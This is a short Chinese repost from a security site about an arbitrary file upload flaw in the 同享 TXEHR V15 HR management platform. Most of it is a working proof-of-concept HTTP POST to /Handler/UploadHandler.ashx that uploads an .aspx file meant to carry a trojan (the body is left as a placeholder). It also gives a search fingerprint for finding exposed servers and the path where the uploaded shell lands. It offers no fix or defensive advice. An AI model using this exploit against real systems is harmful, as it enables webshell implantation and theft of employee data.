同享EHR存在UploadHandler.ashx文件上传漏洞

admin 2024年8月5日10:55:35评论34 views字数 764阅读2分32秒阅读模式
1
漏洞描述

同享软件成立于1997年,运营中心位于东莞南城南新产业国际。专注研发和推广人力资源信息化产品,帮助企业构建统一的人力资源数智化平台,快速提高企业人才管理能力,提升人力资源管理效率,帮助员工快速成长,协助企业实现智慧决策。同享TXEHR V15人力管理管理平台UploadHandler存在任意文件上传漏洞。

 
2
漏洞复现

首页

同享EHR存在UploadHandler.ashx文件上传漏洞

bp发包

同享EHR存在UploadHandler.ashx文件上传漏洞

链接地址:地址/Handler/Uploadfile2/1.aspx

 
3
网络测绘

body="/Assistant/Default.aspx"

 
4
漏洞POC
POST /Handler/UploadHandler.ashx?folder=Uploadfile2 HTTP/1.1
Host: 地址
accept: */*
Content-Type: multipart/form-data; boundary=---------------------------123
Content-Length: 169
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------123
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: text/plain

木马内容
-----------------------------123--

原文始发于微信公众号(我吃饼干):【漏洞复现】同享EHR存在UploadHandler.ashx文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日10:55:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   同享EHR存在UploadHandler.ashx文件上传漏洞https://cn-sec.com/archives/3036170.html

发表评论

匿名网友 填写信息